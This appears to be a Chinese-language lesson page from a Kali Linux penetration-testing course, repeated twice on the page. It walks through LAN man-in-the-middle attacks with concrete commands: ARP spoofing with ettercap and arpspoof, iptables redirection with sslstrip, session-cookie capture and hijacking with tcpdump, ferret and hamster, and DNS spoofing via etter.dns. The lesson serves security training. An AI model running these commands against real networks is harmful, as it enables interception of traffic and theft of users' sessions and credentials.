Kali Linux Web渗透测试视频教程—第十四课-arp欺骗、嗅探\dns欺骗、session
2016-06-16 00:00
711 查看
目录
Kali Linux Web 渗透测试—第十四课-arp欺骗、嗅探、dns欺骗、session劫持 1
关于嗅探、arp欺骗、会话劫持.............................................................. 1
视频教程地址:http://edu.51cto.com/course/course_id-1887.html
关于嗅探、arp欺骗、会话劫持
会话劫持的实现手段
l 中间人攻击(arp欺骗,dns欺骗)
l 注射式攻击
Arp欺骗--ettercap
1.如果你是第一次进行中间人攻击操作,那么要对kali下的ettercap做点配置,配置文件是/etc/ettercap/etter.conf
首先你要将EC_UID 、EC_GID都变为0,然后找到LINUX分类下的IF YOU USE IPTABLES这一行,将注释(“#”号)去掉,打开转发。
2./etc/NetworkManager/NetworkManager.conf 修改
3.service network-manager restart
4.echo 1 >> /proc/sys/net/ipv4/ip_forward
ettercap -i wlan0 -Tq -M arp:remote /192.168.2.20/ /192.168.2.1/
Arp欺骗—arpspoof
l echo 1 >> /proc/sys/net/ipv4/ip_forward
l arpspoof -i eth0 -t 192.168.14.2 192.168.14.132
数据包捕获
l tcpdump
l wireshark
l drafnet等其他自动化工具
Ssl数据嗅探
l iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(设置)
l iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(取消)
l sslstrip -p -l 10000 -w log.txt
session劫持-arp欺骗
l tcpdump -i eth0 -w qq.cap
l ferret -r qq.cap
l hamster
l 选择目标
l 测试session
64位下ferret 安装
l dpkg --add-architecture i386
l apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y
l sudo aptitude install ferret-sidejack:i386
session劫持-DNS欺骗
l 1. 使用 ettercap 进行arp欺骗
l 2.修改etter.dns 文件
/etc/ettercap/etter.dns
l 3.启用dns_spoof
课后练习:
l 结合前面课程中的 set 工具集,我们在局域网中能做到天衣无缝(钓鱼和消息转发相结合)的钓鱼攻击吗?
l 局域网中的嗅探、钓鱼、session劫持、dns欺骗这一类的攻击的防御方式是什么?
感谢玄魂的分享,想要观看视频,点这里就可以啦:http://edu.51cto.com/course/course_id-1887.html
Kali Linux Web 渗透测试—第十四课-arp欺骗、嗅探、dns欺骗、session劫持 1
关于嗅探、arp欺骗、会话劫持.............................................................. 1
视频教程地址:http://edu.51cto.com/course/course_id-1887.html
关于嗅探、arp欺骗、会话劫持
会话劫持的实现手段
l 中间人攻击(arp欺骗,dns欺骗)
l 注射式攻击
Arp欺骗--ettercap
1.如果你是第一次进行中间人攻击操作,那么要对kali下的ettercap做点配置,配置文件是/etc/ettercap/etter.conf
首先你要将EC_UID 、EC_GID都变为0,然后找到LINUX分类下的IF YOU USE IPTABLES这一行,将注释(“#”号)去掉,打开转发。
2./etc/NetworkManager/NetworkManager.conf 修改
3.service network-manager restart
4.echo 1 >> /proc/sys/net/ipv4/ip_forward
ettercap -i wlan0 -Tq -M arp:remote /192.168.2.20/ /192.168.2.1/
Arp欺骗—arpspoof
l echo 1 >> /proc/sys/net/ipv4/ip_forward
l arpspoof -i eth0 -t 192.168.14.2 192.168.14.132
数据包捕获
l tcpdump
l wireshark
l drafnet等其他自动化工具
Ssl数据嗅探
l iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(设置)
l iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(取消)
l sslstrip -p -l 10000 -w log.txt
session劫持-arp欺骗
l tcpdump -i eth0 -w qq.cap
l ferret -r qq.cap
l hamster
l 选择目标
l 测试session
64位下ferret 安装
l dpkg --add-architecture i386
l apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y
l sudo aptitude install ferret-sidejack:i386
session劫持-DNS欺骗
l 1. 使用 ettercap 进行arp欺骗
l 2.修改etter.dns 文件
/etc/ettercap/etter.dns
l 3.启用dns_spoof
课后练习:
l 结合前面课程中的 set 工具集,我们在局域网中能做到天衣无缝(钓鱼和消息转发相结合)的钓鱼攻击吗?
l 局域网中的嗅探、钓鱼、session劫持、dns欺骗这一类的攻击的防御方式是什么?
感谢玄魂的分享,想要观看视频,点这里就可以啦:http://edu.51cto.com/course/course_id-1887.html
相关文章推荐
- Linux性能实时监测工具 Netdata
- linux中断编程函数
- libev 学习笔记之主体事件循环
- SSMTP—让Linux系统从Office 365发送邮件
- 自学Linux命令的四种方法
- Linux下解决no jdk found问题
- linux系统之帮助命令(man)
- Linux下coredump文件的查看
- Linux初学问题(1)
- 在linux环境下安装和配置Spark
- linux中环境搭建部署
- Hi3520 SDK 在ubuntu下安装说明
- Windows Azure 平台重置Linux密码的方法
- ubuntu/linux下命令行安装jdk
- 解决 请按ENTER或者按其他键继续的问题
- CPU内存管理和linux内存分页机制
- uC/OS室温计
- linux 系统负载高 如何检查
- Linux中软连接和硬链接
- linux基础——进程和线程